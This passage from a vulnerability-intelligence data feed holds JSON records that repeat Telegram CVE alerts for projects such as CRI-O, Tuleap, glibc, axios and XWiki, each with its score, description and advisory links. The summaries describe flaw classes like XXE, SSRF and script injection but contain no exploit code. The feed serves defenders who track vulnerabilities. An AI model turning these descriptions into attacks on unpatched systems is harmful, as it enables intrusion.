https://github.com/pwndoc/pwndoc/security/advisories/GHSA-r3vj-47cf-4672\n2. https://github.com/pwndoc/pwndoc/commit/68aa1ea676a91e17bfb333a27571151bd07fb21d\n3. https://github.com/pwndoc/pwndoc/blob/14acb704891245bf1703ce6296d62112e85aa995/backend/src/models/template.js#L170-L175\n4. https://github.com/pwndoc/pwndoc/blob/14acb704891245bf1703ce6296d62112e85aa995/backend/src/routes/backup.js#L826-L827\n5. https://github.com/pwndoc/pwndoc/blob/14acb704891245bf1703ce6296d62112e85aa995/backend/src/routes/template.js#L63-L66\n6. https://github.com/pwndoc/pwndoc/releases/tag/v1.2.0", "creation_timestamp": "2025-03-04T20:32:00.000000Z"}, {"uuid": "8cf4a80f-1acb-4053-a3a7-c048c9d3fce5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:0648", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/6398", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-8676\n\ud83d\udd25 CVSS Score: 7.4 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N)\n\ud83d\udd39 Description: A vulnerability was found in CRI-O, where it can be requested to take a checkpoint archive of a container and later be asked to restore it. When it does that restoration, it attempts to restore the mounts from the restore archive instead of the pod request. As a result, the validations run on the pod spec, verifying that the pod has access to the mounts it specifies are not applicable to a restored container. This flaw allows a malicious user to trick CRI-O into restoring a pod that doesn't have access to host mounts. The user needs access to the kubelet or cri-o socket to call the restore endpoint and trigger the restore.\n\ud83d\udccf Published: 2024-11-26T19:15:48.475Z\n\ud83d\udccf Modified: 2025-03-04T18:20:24.881Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHBA-2024:10826\n2. https://access.redhat.com/errata/RHSA-2025:0648\n3. https://access.redhat.com/errata/RHSA-2025:1908\n4. https://access.redhat.com/security/cve/CVE-2024-8676\n5. https://bugzilla.redhat.com/show_bug.cgi?id=2313842", "creation_timestamp": "2025-03-04T18:32:39.000000Z"}, {"uuid": "b9440658-cbbb-447e-a57c-32e6a4a1f28b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-655Q-FX9R-782V", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/6364", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-1889\n\ud83d\udd25 CVSS Score: 5.3 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N)\n\ud83d\udd39 Description: picklescan before 0.0.22 only considers standard pickle file extensions in the scope for its vulnerability scan. An attacker could craft a malicious model that uses Pickle and include a malicious pickle file with a non-standard file extension. Because the malicious pickle file inclusion is not considered as part of the scope of picklescan, the file would pass security checks and appear to be safe, when it could instead prove to be problematic.\n\ud83d\udccf Published: 2025-03-03T18:38:10.046Z\n\ud83d\udccf Modified: 2025-03-04T11:24:31.773Z\n\ud83d\udd17 References:\n1. https://sites.google.com/sonatype.com/vulnerabilities/cve-2025-1889\n2. https://github.com/mmaitre314/picklescan/security/advisories/GHSA-655q-fx9r-782v", "creation_timestamp": "2025-03-04T11:30:36.000000Z"}, {"uuid": "97f08589-535c-44e5-aa4e-a2d5b0132403", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3RJF-87RF-H8M9", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/6395", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-27401\n\ud83d\udd25 CVSS Score: 4.6 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:L)\n\ud83d\udd39 Description: Tuleap is an Open Source Suite to improve management of software developments and collaboration. In a standard usages of Tuleap, the issue has a limited impact, it will mostly leave dangling data. However, a malicious user could create and delete reports multiple times to cycle through all the filters of all reports of the instance and delete them. The malicious user only needs to have access to one tracker. This would result in the loss of all criteria filters forcing users and tracker admins to re-create them. This vulnerability is fixed in Tuleap Community Edition 16.4.99.1740498975 and Tuleap Enterprise Edition 16.4-6 and 16.3-11.\n\ud83d\udccf Published: 2025-03-04T16:58:18.478Z\n\ud83d\udccf Modified: 2025-03-04T17:20:34.993Z\n\ud83d\udd17 References:\n1. https://github.com/Enalean/tuleap/security/advisories/GHSA-3rjf-87rf-h8m9\n2. https://github.com/Enalean/tuleap/commit/0070fef5c3b27fd402d3232041c6e03f79a84ffd\n3. https://tuleap.net/plugins/tracker/?aid=41850", "creation_timestamp": "2025-03-04T17:34:05.000000Z"}, {"uuid": "32af8bf5-350b-4c8e-88ad-fd1dc5aba547", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JC5R-684X-J46Q", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/6409", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-27150\n\ud83d\udd25 CVSS Score: 5.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N)\n\ud83d\udd39 Description: Tuleap is an Open Source Suite to improve management of software developments and collaboration. The password to connect the Redis instance is not purged from the archive generated with tuleap collect-system-data. These archives are likely to be used by support teams that should not have access to this password. The vulnerability is fixed in Tuleap Community Edition 16.4.99.1740492866 and Tuleap Enterprise Edition 16.4-6 and 16.3-11.\n\ud83d\udccf Published: 2025-03-04T16:48:43.226Z\n\ud83d\udccf Modified: 2025-03-04T18:52:59.756Z\n\ud83d\udd17 References:\n1. https://github.com/Enalean/tuleap/security/advisories/GHSA-jc5r-684x-j46q\n2. https://github.com/Enalean/tuleap/commit/a6702622a8db969a17522b8fac0774afdb1c916f\n3. https://tuleap.net/plugins/tracker/?aid=41870", "creation_timestamp": "2025-03-04T19:33:55.000000Z"}, {"uuid": "e5f0d94d-787e-47ab-aec8-d82e8fefa05a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-X2V2-XR59-C9CF", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/6392", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-27156\n\ud83d\udd25 CVSS Score: 4.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N)\n\ud83d\udd39 Description: Tuleap is an Open Source Suite to improve management of software developments and collaboration. The mass emailing features do not sanitize the content of the HTML emails. A malicious user could use this issue to facilitate a phishing attempt or to indirectly exploit issues in the recipients mail clients. This vulnerability is fixed in Tuleap Community Edition 16.4.99.1740567344 and Tuleap Enterprise Edition 16.4-6 and 16.3-11.\n\ud83d\udccf Published: 2025-03-04T16:53:49.741Z\n\ud83d\udccf Modified: 2025-03-04T17:22:15.113Z\n\ud83d\udd17 References:\n1. https://github.com/Enalean/tuleap/security/advisories/GHSA-x2v2-xr59-c9cf\n2. https://github.com/Enalean/tuleap/commit/a0bc657297b405debce1f5bcbbb30c733f3f09bd\n3. https://tuleap.net/plugins/tracker/?aid=42177", "creation_timestamp": "2025-03-04T17:34:03.000000Z"}, {"uuid": "249ce4e8-6e0f-4862-8c49-b7842b665fb0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2023:5455", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/14151", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-4813\n\ud83d\udd25 CVSS Score: 5.9 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A flaw was found in glibc. In an uncommon situation, the gaih_inet function may use memory that has been freed, resulting in an application crash. This issue is only exploitable when the getaddrinfo function is called and the hosts database in /etc/nsswitch.conf is configured with SUCCESS=continue or SUCCESS=merge.\n\ud83d\udccf Published: 2023-09-12T21:54:33.387Z\n\ud83d\udccf Modified: 2025-04-30T19:58:08.516Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHBA-2024:2413\n2. https://access.redhat.com/errata/RHSA-2023:5453\n3. https://access.redhat.com/errata/RHSA-2023:5455\n4. https://access.redhat.com/errata/RHSA-2023:7409\n5. https://access.redhat.com/security/cve/CVE-2023-4813\n6. https://bugzilla.redhat.com/show_bug.cgi?id=2237798", "creation_timestamp": "2025-04-30T20:14:27.000000Z"}, {"uuid": "2a836ada-f155-4263-b648-2d1c509ed26c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FRXM-VM48-5QF2", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/6273", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-27500\n\ud83d\udd25 CVSS Score: 8.2 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N)\n\ud83d\udd39 Description: OpenZiti is a free and open source project focused on bringing zero trust to any application. An endpoint(/api/upload) on the admin panel can be accessed without any form of authentication. This endpoint accepts an HTTP POST to upload a file which is then stored on the node and is available via URL. This can lead to a stored cross site scripting attack if the file uploaded contains malicious code and is then accessed and executed within the context of the user's browser. This function is no longer necessary as the ziti-console moves from a node server application to a single page application, and has been disabled. The vulnerability is fixed in 3.7.1.\n\ud83d\udccf Published: 2025-03-03T18:30:48.198Z\n\ud83d\udccf Modified: 2025-03-03T20:22:19.785Z\n\ud83d\udd17 References:\n1. https://github.com/openziti/ziti-console/security/advisories/GHSA-frxm-vm48-5qf2", "creation_timestamp": "2025-03-03T20:30:35.000000Z"}, {"uuid": "284e3949-b982-44ee-b5a1-033fff8eeeea", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2CMQ-823J-5QJ8", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/6771", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-27598\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: ImageSharp is a 2D graphics API. An Out-of-bounds Write vulnerability has been found in the ImageSharp gif decoder, allowing attackers to cause a crash using a specially crafted gif. This can potentially lead to denial of service. The problem has been patched. All users are advised to upgrade to v3.1.7 or v2.1.10.\n\ud83d\udccf Published: 2025-03-06T22:23:39.486Z\n\ud83d\udccf Modified: 2025-03-06T22:23:39.486Z\n\ud83d\udd17 References:\n1. https://github.com/SixLabors/ImageSharp/security/advisories/GHSA-2cmq-823j-5qj8\n2. https://github.com/SixLabors/ImageSharp/issues/2859\n3. https://github.com/SixLabors/ImageSharp/pull/2890", "creation_timestamp": "2025-03-06T22:33:42.000000Z"}, {"uuid": "4f57c0a0-d3bb-435a-b028-6363ac000793", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-J53P-R755-V4JF", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/7045", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-26041\n\ud83d\udd25 CVSS Score: 2.6 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:N/A:N)\n\ud83d\udd39 Description: Nextcloud Talk is a fully on-premises audio/video and chat communication service. When cron jobs were misconfigured and therefore messages are not expired, the API would still return them while they were then hidden by the frontend code. It is recommended that the Nextcloud Talk is upgraded to 15.0.3. There are no workaround available.\n\n\ud83d\udccf Published: 2023-02-27T20:16:09.191Z\n\ud83d\udccf Modified: 2025-03-10T18:48:46.855Z\n\ud83d\udd17 References:\n1. https://github.com/nextcloud/security-advisories/security/advisories/GHSA-j53p-r755-v4jf\n2. https://github.com/nextcloud/spreed/pull/8515\n3. https://hackerone.com/reports/1784310", "creation_timestamp": "2025-03-10T19:38:40.000000Z"}, {"uuid": "5651a004-b6f8-4a76-a495-15f75c4ef230", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7RRJ-XR53-82P7", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/7065", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-22466\n\ud83d\udd25 CVSS Score: 5.4 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:L)\n\ud83d\udd39 Description: Tokio is a runtime for writing applications with Rust. Starting with version 1.7.0 and prior to versions 1.18.4, 1.20.3, and 1.23.1, when configuring a Windows named pipe server, setting `pipe_mode` will reset `reject_remote_clients` to `false`. If the application has previously configured `reject_remote_clients` to `true`, this effectively undoes the configuration. Remote clients may only access the named pipe if the named pipe's associated path is accessible via a publicly shared folder (SMB). Versions 1.23.1, 1.20.3, and 1.18.4 have been patched. The fix will also be present in all releases starting from version 1.24.0. Named pipes were introduced to Tokio in version 1.7.0, so releases older than 1.7.0 are not affected. As a workaround, ensure that `pipe_mode` is set first after initializing a `ServerOptions`.\n\ud83d\udccf Published: 2023-01-04T21:47:09.400Z\n\ud83d\udccf Modified: 2025-03-10T21:32:32.950Z\n\ud83d\udd17 References:\n1. https://github.com/tokio-rs/tokio/security/advisories/GHSA-7rrj-xr53-82p7\n2. https://github.com/tokio-rs/tokio/pull/5336\n3. https://github.com/tokio-rs/tokio/releases/tag/tokio-1.23.1\n4. https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-createnamedpipea#pipe_reject_remote_clients", "creation_timestamp": "2025-03-10T21:39:20.000000Z"}, {"uuid": "46639ff6-f19b-4d60-94ea-369a5c5c89fc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-Q9JP-XV4G-328F", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/7070", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-23546\n\ud83d\udd25 CVSS Score: 5.5 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N)\n\ud83d\udd39 Description: In version 2.9.0.beta14 of Discourse, an open-source discussion platform, maliciously embedded urls can leak an admin's digest of recent topics, possibly exposing private information. A patch is available for version 2.9.0.beta15. There are no known workarounds for this issue.\n\ud83d\udccf Published: 2023-01-05T18:10:08.048Z\n\ud83d\udccf Modified: 2025-03-10T21:32:03.679Z\n\ud83d\udd17 References:\n1. https://github.com/discourse/discourse/security/advisories/GHSA-q9jp-xv4g-328f\n2. https://github.com/discourse/discourse/commit/cf862e736565c6fa905c12b5dbe63d0bd056efb8", "creation_timestamp": "2025-03-10T21:39:27.000000Z"}, {"uuid": "40c6b4b4-8097-4b08-9f71-674243c509ee", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QR4Q-6H3M-H3G7", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/7130", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-23609\n\ud83d\udd25 CVSS Score: 8.2 (cvssV3_1, Vector: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:L)\n\ud83d\udd39 Description: Contiki-NG is an open-source, cross-platform operating system for Next-Generation IoT devices. Versions prior to and including 4.8 are vulnerable to an out-of-bounds write that can occur in the BLE-L2CAP module. The Bluetooth Low Energy - Logical Link Control and Adaptation Layer Protocol (BLE-L2CAP) module handles fragmentation of packets up the configured MTU size. When fragments are reassembled, they are stored in a packet buffer of a configurable size, but there is no check to verify that the packet buffer is large enough to hold the reassembled packet. In Contiki-NG's default configuration, it is possible that an out-of-bounds write of up to 1152 bytes occurs. The vulnerability has been patched in the \"develop\" branch of Contiki-NG, and will be included in release 4.9. The problem can be fixed by applying the patch in Contiki-NG pull request #2254 prior to the release of version 4.9.\n\ud83d\udccf Published: 2023-01-25T06:15:34.128Z\n\ud83d\udccf Modified: 2025-03-11T13:32:09.104Z\n\ud83d\udd17 References:\n1. https://github.com/contiki-ng/contiki-ng/security/advisories/GHSA-qr4q-6h3m-h3g7\n2. https://github.com/contiki-ng/contiki-ng/pull/2254", "creation_timestamp": "2025-03-11T13:39:45.000000Z"}, {"uuid": "e33593d6-5d4d-416f-b9fc-b9878674d113", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WMXH-PXCX-9W24", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/6850", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-27607\n\ud83d\udd25 CVSS Score: 8.8 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: Python JSON Logger is a JSON Formatter for Python Logging. Between 30 December 2024 and 4 March 2025 Python JSON Logger was vulnerable to RCE through a missing dependency. This occurred because msgspec-python313-pre was deleted by the owner leaving the name open to being claimed by a third party. If the package was claimed, it would allow them RCE on any Python JSON Logger user who installed the development dependencies on Python 3.13 (e.g. pip install python-json-logger[dev]). This issue has been resolved with 3.3.0.\n\ud83d\udccf Published: 2025-03-07T16:18:13.789Z\n\ud83d\udccf Modified: 2025-03-07T16:18:13.789Z\n\ud83d\udd17 References:\n1. https://github.com/nhairs/python-json-logger/security/advisories/GHSA-wmxh-pxcx-9w24\n2. https://github.com/nhairs/python-json-logger/commit/2548e3a2e3cedf6bef3ee7c60c55b7c02d1af11a\n3. https://github.com/nhairs/python-json-logger/commit/e7761e56edb980cfab0165e32469d5fd017a5d72", "creation_timestamp": "2025-03-07T16:35:20.000000Z"}, {"uuid": "3b3addcd-455d-4d13-a663-dba00bf31695", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-46R4-F8GJ-XG56", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/7223", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-27773\n\ud83d\udd25 CVSS Score: 8.6 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N)\n\ud83d\udd39 Description: The SimpleSAMLphp SAML2 library is a PHP library for SAML2 related functionality. Prior to versions 4.17.0 and 5.0.0-alpha.20, there is a signature confusion attack in the HTTPRedirect binding. An attacker with any signed SAMLResponse via the HTTP-Redirect binding can cause the application to accept an unsigned message. Versions 4.17.0 and 5.0.0-alpha.20 contain a fix for the issue.\n\ud83d\udccf Published: 2025-03-11T19:04:52.135Z\n\ud83d\udccf Modified: 2025-03-11T19:27:00.852Z\n\ud83d\udd17 References:\n1. https://github.com/simplesamlphp/saml2/security/advisories/GHSA-46r4-f8gj-xg56\n2. https://github.com/simplesamlphp/saml2/commit/7867d6099dc7f31bed1ea10e5bea159c5623d2a0\n3. https://github.com/simplesamlphp/saml2/blob/9545abd0d9d48388f2fa00469c5c1e0294f0303e/src/SAML2/HTTPRedirect.php#L104-L113\n4. https://github.com/simplesamlphp/saml2/blob/9545abd0d9d48388f2fa00469c5c1e0294f0303e/src/SAML2/HTTPRedirect.php#L178-L217", "creation_timestamp": "2025-03-11T20:21:09.000000Z"}, {"uuid": "41f625b2-136b-49cb-990a-71bd1a4e5b2a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VWJX-MMWM-PWRF", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/6775", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-38693\n\ud83d\udd25 CVSS Score: 9.8 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: Lucee Server (or simply Lucee) is a dynamic, Java based, tag and scripting language used for rapid web application development. The Lucee REST endpoint is vulnerable to RCE via an XML XXE attack. This vulnerability is fixed in Lucee 5.4.3.2, 5.3.12.1, 5.3.7.59, 5.3.8.236, and 5.3.9.173.\n\ud83d\udccf Published: 2025-03-05T15:37:55.847Z\n\ud83d\udccf Modified: 2025-03-06T21:58:44.944Z\n\ud83d\udd17 References:\n1. https://github.com/lucee/Lucee/security/advisories/GHSA-vwjx-mmwm-pwrf", "creation_timestamp": "2025-03-06T22:33:45.000000Z"}, {"uuid": "3a57e4bf-d29f-4478-a6cd-1a6e04d0b4f9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2J8F-6WHH-FRC8", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/6597", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-23498\n\ud83d\udd25 CVSS Score: 7.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:L)\n\ud83d\udd39 Description: Grafana is an open-source platform for monitoring and observability. When datasource query caching is enabled, Grafana caches all headers, including `grafana_session`. As a result, any user that queries a datasource where the caching is enabled can acquire another user\u2019s session. To mitigate the vulnerability you can disable datasource query caching for all datasources. This issue has been patched in versions 9.2.10 and 9.3.4.\n\n\ud83d\udccf Published: 2023-02-03T21:34:58.677Z\n\ud83d\udccf Modified: 2025-03-05T19:27:24.444Z\n\ud83d\udd17 References:\n1. https://github.com/grafana/grafana/security/advisories/GHSA-2j8f-6whh-frc8", "creation_timestamp": "2025-03-05T20:01:17.000000Z"}, {"uuid": "8bbe767e-9050-4add-a61b-d632a0cf6e3d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3HVJ-3CG9-V242", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/6561", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-26052\n\ud83d\udd25 CVSS Score: 3.7 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N)\n\ud83d\udd39 Description: Saleor is a headless, GraphQL commerce platform delivering personalized shopping experiences. Some internal Python exceptions are not handled properly and thus are returned in API as error messages. Some messages might contain sensitive information like infrastructure details in unauthenticated requests. This issue has been patched in versions 3.1.48, 3.7.59, 3.8.0, 3.9.27, 3.10.14 and 3.11.12. \n\ud83d\udccf Published: 2023-03-02T18:54:33.030Z\n\ud83d\udccf Modified: 2025-03-05T16:10:59.226Z\n\ud83d\udd17 References:\n1. https://github.com/saleor/saleor/security/advisories/GHSA-3hvj-3cg9-v242\n2. https://github.com/saleor/saleor/releases/tag/3.1.48\n3. https://github.com/saleor/saleor/releases/tag/3.10.14\n4. https://github.com/saleor/saleor/releases/tag/3.11.12\n5. https://github.com/saleor/saleor/releases/tag/3.7.59\n6. https://github.com/saleor/saleor/releases/tag/3.8.30\n7. https://github.com/saleor/saleor/releases/tag/3.9.27", "creation_timestamp": "2025-03-05T16:32:27.000000Z"}, {"uuid": "789b3450-8e77-44a5-9c10-f55fe984f93b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JR5F-V2JV-69X6", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/6839", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-27152\n\ud83d\udd25 CVSS Score: 7.7 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P)\n\ud83d\udd39 Description: axios is a promise based HTTP client for the browser and node.js. The issue occurs when passing absolute URLs rather than protocol-relative URLs to axios. Even if \u2060baseURL is set, axios sends the request to the specified absolute URL, potentially causing SSRF and credential leakage. This issue impacts both server-side and client-side usage of axios. This issue is fixed in 1.8.2.\n\ud83d\udccf Published: 2025-03-07T15:13:15.155Z\n\ud83d\udccf Modified: 2025-03-07T15:13:15.155Z\n\ud83d\udd17 References:\n1. https://github.com/axios/axios/security/advisories/GHSA-jr5f-v2jv-69x6\n2. https://github.com/axios/axios/issues/6463", "creation_timestamp": "2025-03-07T15:35:16.000000Z"}, {"uuid": "47becf87-1993-4a59-8720-b4b823d86b40", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-C724-3XG7-G3HF", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/6625", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-26053\n\ud83d\udd25 CVSS Score: 6.6 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: Gradle is a build tool with a focus on build automation and support for multi-language development. This is a collision attack on long IDs (64bits) for PGP keys. Users of dependency verification in Gradle are vulnerable if they use long IDs for PGP keys in a `trusted-key` or `pgp` element in their dependency verification metadata file. The fix is to fail dependency verification if anything but a fingerprint is used in a trust element in dependency verification metadata. The problem is fixed in Gradle 8.0 and above. The problem is also patched in Gradle 6.9.4 and 7.6.1. As a workaround, use only full fingerprint IDs for `trusted-key` or `pgp` element in the metadata is a protection against this issue.\n\ud83d\udccf Published: 2023-03-02T03:11:31.488Z\n\ud83d\udccf Modified: 2025-03-05T21:15:36.343Z\n\ud83d\udd17 References:\n1. https://github.com/gradle/gradle/security/advisories/GHSA-c724-3xg7-g3hf\n2. https://github.com/gradle/gradle/commit/bf3cc0f2b463033037e67aaacda31291643ea1a9\n3. https://security.netapp.com/advisory/ntap-20230413-0002/", "creation_timestamp": "2025-03-05T21:35:05.000000Z"}, {"uuid": "bd763708-d1b2-4792-8262-d7c869f763d4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-X2QM-R4WX-8GPG", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/6618", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-26477\n\ud83d\udd25 CVSS Score: 10 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: XWiki Platform is a generic wiki platform. Starting in versions 6.3-rc-1 and 6.2.4, it's possible to inject arbitrary wiki syntax including Groovy, Python and Velocity script macros via the `newThemeName` request parameter (URL parameter), in combination with additional parameters. This has been patched in the supported versions 13.10.10, 14.9-rc-1, and 14.4.6. As a workaround, it is possible to edit `FlamingoThemesCode.WebHomeSheet` and manually perform the changes from the patch fixing the issue.\n\n\ud83d\udccf Published: 2023-03-02T17:52:40.359Z\n\ud83d\udccf Modified: 2025-03-05T21:27:38.903Z\n\ud83d\udd17 References:\n1. https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-x2qm-r4wx-8gpg\n2. https://github.com/xwiki/xwiki-platform/commit/ea2e615f50a918802fd60b09ec87aa04bc6ea8e2#diff-e2153fa59f9d92ef67b0afbf27984bd17170921a3b558fac227160003d0dfd2aR283-R284\n3. https://jira.xwiki.org/browse/XWIKI-19757", "creation_timestamp": 